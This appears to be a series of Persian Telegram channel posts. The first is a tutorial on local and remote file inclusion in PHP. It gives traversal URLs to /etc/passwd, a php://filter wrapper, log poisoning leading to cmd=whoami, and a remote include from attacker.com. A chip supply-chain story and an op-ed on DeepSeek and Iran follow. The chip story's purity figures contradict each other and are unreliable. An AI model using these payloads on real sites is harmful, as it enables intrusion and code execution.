SCARPA | AI Security ☢️

4️⃣ توضیح کامل آسیب پذیری LFI =

شبه کد آسیب پذیر با PHP به LFI 👇
include($_GET['file']);
وقتی کد بالا استفاده بشه، با URL زیر میتونیم بهش مقدار بدیم :
http://target.com/index.php?file=news.php
در URL بالا فایل news.php داخل فایل index.php فراخوانی شده است. برای بهتره برداری ازش در مرحله اول باید سعی کنیم فایل passwd را بخوانیم.
http://target.com/index.php?file=../../../../../../../etc/passwd

5️⃣ استفاده از Wrapper ها =

در LFI میتونیم از wrapper ها هم استفاده کنیم. از Wrapper زیر برای خوندن فایل استفاده میشه که میتونیم باهاش کد های وب سایت رو بخونیم.
php://filter/convert.base64-encode/Resource=index.php
خروجی به صورت base64 هست و باید decode بشه.

6️⃣ تبدیل LFI به RCE =

روش های مختلفی برای تبدیل LFI به RCE وجود دارد مثل :
1) Expect Wrapper
2) Input Wrapper
3) Log Poisoning
4) phpinfo in php
5) Chain LFI & SQLi
6) PHP Session
7) Chain LFI & RFU

1️⃣⏺️6️⃣ تکنیک Log Poisoning :

بعد از پیدا کردن LFI، باید دنبال یک فایلی در سرور باشیم که دیتایی از سمت کاربر ذخیره میشه داخلش. باید دسترسی خوندن اون فایل رو داشته باشیم. میتونیم موارد زیر رو بررسی کنیم :
1) Apache/Nginx Log file
2) FTP Log file
3) SSH Log file
4) SMTP Log file
5) SFTP Log file
مثلا تو log file های مربوط به وب سرور خیلی وقتا user-agent هم لاگ میشه.(قبلش باید فایل Log رو با LFI بخونیم و مطمئن بشیم از این مورد). تنها کاری که باید انجام بدیم inject کردن پیلود مخرب به عنوان user agent هست.
GET /test HTTP/1.1
..
..
..
User-Agent:
و این اطلاعات در لاگ فایل مربوط به Apache ذخیره میشه. حالا باید از طریق LFI اون فایل رو فراخوانی کنیم و پارامتر cmd رو مقدار دهی کنیم.
http://target.com/index.php?file=../../../../../var/apache2/access.log&cmd=whoami
و RCE گرفته میشه.
برای مابقی سرویس هاهم Log poisoning به این صورت انجام میشه با این تفاوت که اونجا user agent نداریم و چیز دیگه ای از کاربر Log میشه مثل یوزرنیم.

7️⃣ آسیب پذیری RFI =

تو آسیب پذیری LFI همه فایل هایی که فراخوانی میکردیم Local بودن. تو آسیب پذیری RFI فایل های Remote هم فراخوانی میکنیم. فرضا یک فایل در سرور خودمون قرار میدیم با اکستنشن txt. و به عنوان ورودی به تارگت میدیم.
http://target.com/index.php.php?file=http://attacker.com/RFI.txt

اما حالت پیشفرض این آسیب پذیری وجود نداره حتی اگه LFI وجود داشته باشه، باید کانفیگ های مربوط به دو مورد زیر به صورت دستی توسط برنامه نویس تغییر داده بشه تا قابلیت فراخوانی فایل به صورت remote فعال بشه.
allow_url_include
allow_url_fopen
وقتی آسیب پذیری RFI داریم قطعا LFI هم داریم. اما وقتی LFI هست تا وقتی دو تابع بالا فعال نباشن آسیب پذیری RFI وجود نخواهد داشت.

1️⃣⏺️7️⃣ آیا اگر بتونیم یک فایل remote روی وب سایت لود کنیم RFI داریم همیشه❓

خیر. علاوه بر فراخوانی به صورت remote باید تابع آسیب پذیر قابلیت اجرایی داشته باشه تا بتونیم کد سمت backend اجرا کنیم‌ (همون خاصیت LFI) . در غیر این صورت فقط میتونیم یک فایل JS. به صورت remote لود کنیم و به XSS برسیم.

#LFI
#RFI
#Path_traversal
#Directory_traversal

منبع اصلی:@web_appsec

بخش اول

در اعماق دنیای تکنولوژی، نبردی خاموش اما حیاتی در جریان است،نبردی برای خلق موجوداتی هوشمند، موجوداتی که می‌توانند آینده‌ی بشریت را تغییر دهند

زنجیره‌ای که از ذراتشن در ساحل آغاز شده و به مغزهای سیلیکونی ختم می‌شود، این زنجیره، مهم‌ترین و پیچیده‌ترین زنجیره‌ی حال حاضر جهان است، زنجیره‌ای که آینده بشریت را دگرگون خواهند ساخت،و در اینده با ترکیب نورون های بیولوژیکی ما را وارد عصر جدیدی میکند
شروع این زنجیره از شن‌های ساحل آغاز می‌شود، شن‌هایی که در خود رازی بزرگ پنهان کرده‌اند، و آن چیزی نیست جز سیلیکون ها...


با گذر از فرآیندی پیچیده و پرهزینه، سیلیکون به بالاترین سطح خلوص خود، معادل 99.9%، می‌رسد. در هر میلیارد ذره، تنها یک ذره ناخالصی وجود دارد، این سیلیکون فوق‌العاده خالص، به ماده‌ای حیاتی برای ساخت ویفرهای سیلیکونی تبدیل می‌شود؛ صفحاتی شکننده که بستری برای تولد تراشه‌های هوشمند خواهند بود، این فرآیند شبیه به استخراج طلا از دل سنگ است؛ تلاش و دقتی بی‌نظیر می‌طلبد.

در مرحله‌ی بعد، جادوگر هفت عالم، شرکت Zeiss، وارد میدان می‌شود، این شرکت با بهره‌گیری از فناوری‌های پیشرفته، لنزهایی با دقت شگفت‌انگیز تولید می‌کند که قادرند نور را به اندازه‌ای دقیق متمرکز کنند که می‌توانند خطوطی به ضخامت نانومتر، یک میلیاردم متر، بر روی ویفرهای سیلیکونی حک کنند. این دقت به‌قدری است که می‌توان آن را با کشیدن خطی با ضخامت یک تار مو روی سطح ماه مقایسه کرد، این لنزها قلب تپنده‌ی دستگاه‌های لیتوگرافی هستند که الگوهای پیچیده‌ی تراشه‌ها را بر روی ویفرها می‌کشند...

پس از این، نوبت به گام بعدی می‌رسد. ASML، جادوگر کشتی هلندی، با ماشین‌های لیتوگرافی EUV خود وارد عمل می‌شود. این دستگاه‌ها با استفاده از نور فرابنفش با طول موج بسیار کوتاه، قادرند الگوهای فوق‌العاده دقیقی بر روی ویفرها پیاده کنند، این فرآیند، نقاشی با نور در مقیاس نانومتر است و می‌تواند میلیون‌ها ترانزیستور کوچک را در فضایی به اندازه یک سر سوزن جای دهد، این تراکم بی‌نظیر، قدرت پردازش عظیم تراشه‌های مدرن را ممکن می‌سازد.

مرحله چهارم با دخول جن گیر تایوانی آغاز می‌شود، ویفرهای حکاکی‌ شده وارد تاسیسات پیشرفته‌ی TSMC می‌شوند، در این محیط فوق‌العاده تمیز، تراشه‌ها با فرآیندهای شیمیایی و فیزیکی پیچیده ساخته می‌شوند، لایه به لایه، مواد مختلف بر روی ویفرها انباشته شده و سپس با دقت حکاکی می‌شوند تا ساختار سه‌بعدی تراشه شکل بگیرد، این فرآیند، مشابه ساخت یک آسمان‌خراش میکروسکوپی است، ساختمانی که از میلیاردها قطعه کوچک تشکیل شده است.

و در نهایت، در مرحله پنجم، اژدهای پردازش یعنی Nvidia وارد میدان می‌شود، در این مرحله، تراشه‌ها به دست Nvidia سپرده می‌شوند و این شرکت با طراحی هایش، جان تازه‌ای به تراشه‌ها می‌بخشد...

ادامه دارد...

@SACARPA

آمریکاستیزی به روش چینی؟

دیپ سیک، خبرسازترین اتفاق ۲۴ ساعت گذشته، کاری که هوش مصنوعی چینی با بزرگترین شرکتهای فناوری جهان کرد.

دود شدن بیش از ۲۵۰۰ میلیارد دلار ارزش شرکتهای فناوری در بورس آمریکا در یک روز - روزی که در تاریخ خواهد ماند. عددی معادل ۲۰ برابر کل ارزش بورس ایران!

چین نه مشتهایش را گره کرد، نه شعار مرگ بر این و آن داد، نه نیمی از جهان را دشمن خطاب کرد، نه در مجلس‌اش عربده کشی کرد، نه روابطش را با جایی محدود کرد، نه از روی پرچم کشوری راه رفت یا آنرا آتش زد.

چین با کمک تکنولوژی آمریکایی، اما با سرمایه و هوش چینی به جنگ فناوری آمریکایی رفت و کاری که کرد کوتاه کردن الگوریتم جستجو، و بنابراین سرمایه و زمان عملکرد هوش مصنوعی بود. چینی ها آنرا به ۰.۲% کاهش دادند!

هوش مصنوعی چینی بجای آنکه همه‌چیزدان باشد اطلاعات مورد نیازش را در زمان استفاده احضار می کند. فقط همین. این روش، هزینه های سنگین سخت افزاری، نرم افزاری و تحلیلی را به شکل مضحکی کم میکند. از این جالبتر اینکه تمام کدها برای استفاده عمومی و توسعه فردی باز گذاشته شده است به این معنا که دیگر محدودیت و انحصاری برای توسعه هوش مصنوعی در دنیا وجود ندارد

آمریکاستیزی از دید چینی‌ها مفهومی غیر از مفهوم ما دارد، آنها، ستیز را در رقابت می بینند، رقابتی که منجر به رفاه و توسعه برای مردم کشورشان شود.
رقابت در توسعه اقتصادی از طریق فناوری، سرمایه گذاری و با اهرم خلاقیت جوانانی که با دنیا در ارتباطند و در نهایت رفاه و ثروتی که برای مملکت و جامعه به دست می آید.

پرسش بزرگ این است که حتی اگر امروز به فرض محال بینش ما به آمریکاستیزی از مدل ایدئولوژیک به مدل اقتصادی تغییر کند، برای کشور ما امکان پذیر است؟

در شرایطی که سایز اقتصاد ما کوچکترین نسبتی با اقتصاد آمریکا ندارد، سرمایه های کشور ترجیح می دهند به خارج از ایران حرکت کنند یا اگر در خارج از کشور هستند به ایران بازنگردند، جوانان خلاق و نخبه ایرانی هر روز کشور را ترک می کنند، امکان استفاده از فناوری روز بدلیل تحریم ها غیرممکن است، استفاده از دانش روز بدلیل انزوا نازل است، پرمنفعت ترین فعالیت های اقتصادی منتسب به دولت است و معضلات این کشور در سطح فیلتر کردن یا نکردن است عملا ایران از سرمایه انسانی، اقتصادی و انگیزه ای تهی شده است و اساسا چنین نگاهی محال است

بنابراین بسیاری از زمان‌هایی که شاید در خلوت خود، از خود می پرسیم چرا با تغییر هر دولت تغییری در این مسیر ایجاد نمی شود پاسخ در اینجاست که ایران با نگاه قبل، اکنون تهی از امکان تحول شده است و حتی به فرض نگاه جدید سالها طول خواهد کشید تا به مسیر تحول بازگردد.

تاریخ اما به ما می گوید روزی فراخواهد رسید که چاره ای جز تغییر نگاه نیست و آن روز، روزی است که منابع دیگری برای استمرار نگاه قبل در مملکت نمانده است!

نویسنده:حامد پاک طینت

@SACARPA